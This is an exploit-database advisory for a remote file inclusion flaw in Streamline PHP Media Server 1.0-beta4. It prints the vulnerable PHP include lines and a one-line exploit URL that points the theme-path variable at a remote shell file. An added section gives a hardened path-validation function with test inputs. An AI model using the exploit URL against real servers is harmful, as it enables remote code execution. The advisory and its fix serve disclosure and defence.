Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion
Author: BiNgZa
type: webapps
platform: php
port:
date_added: 2007-09-18
date_updated: 2016-10-12
verified: 1
codes: OSVDB-38295;CVE-2007-5015;OSVDB-38294;OSVDB-38293;OSVDB-38292;OSVDB-38291;OSVDB-38290
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comstreamline-1.0-beta4.tar.gz
Vulnerability Type: Remote File Inclusion
Vulnerable file: /streamline-1.0-beta4/src/core/theme/includes/account_footer.php
Exploit URL: http://localhost/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://localhost/shell.txt?
Method: GET
Register_globals: On
Vulnerable variable: sl_theme_unix_path
Line number: 2
Lines:
----------------------------------------------
<?
require_once( $sl_theme_unix_path."/account/footer.php" );
require_once( $sl_theme_unix_path."/common/footer.php" );
----------------------------------------------
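A hardened counterpart to the two require_once lines above, as an added example that is not part of the original advisory or the Streamline code base. It canonicalises the theme directory and refuses any value that is not a local directory under a fixed themes root. The function name sl_resolve_theme_dir(), the themes-root layout and the demo files are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example. sl_resolve_theme_dir() and the directory layout are hypothetical.
function sl_resolve_theme_dir(string $candidate, string $themesRoot): string
{
    $root = realpath($themesRoot);
    $real = realpath($candidate); // false for URLs (http://, ftp://) and missing paths
    if ($root === false || $real === false || !is_dir($real)) {
        throw new InvalidArgumentException('not a local directory');
    }
    // Compare with a trailing separator so /themes-evil cannot pass as /themes.
    if (strpos($real . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException('outside themes root');
    }
    return $real;
}

// Constructed demo tree: <tmp>/sl_demo_xxxx/themes/default/{account,common}/footer.php
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sl_demo_' . bin2hex(random_bytes(4));
$root = $base . '/themes';
foreach (['account', 'common'] as $part) {
    mkdir("$root/default/$part", 0700, true);
    file_put_contents("$root/default/$part/footer.php", "<?php echo \"$part footer\\n\";");
}

// Constructed inputs: a valid theme, the URL value from the advisory, a traversal.
$candidates = [
    "$root/default",
    'http://localhost/shell.txt?',
    "$root/default/../..",
];

foreach ($candidates as $value) {
    try {
        $dir = sl_resolve_theme_dir($value, $root);
        // Only a validated, canonical local path ever reaches require_once.
        require_once $dir . '/account/footer.php';
        require_once $dir . '/common/footer.php';
    } catch (InvalidArgumentException $e) {
        echo "rejected ($value): ", $e->getMessage(), "\n";
    }
}
```

In the real file the theme path should come from server-side configuration rather than a request-settable global; register_globals was removed in PHP 5.4, and allow_url_include (off by default since PHP 5.2) blocks URL includes at the interpreter level.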
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke
FoUnD By BiNgZa
DoRk: :(
shadowcrew@hotmail.co.uk
# milw0rm.com [2007-09-19]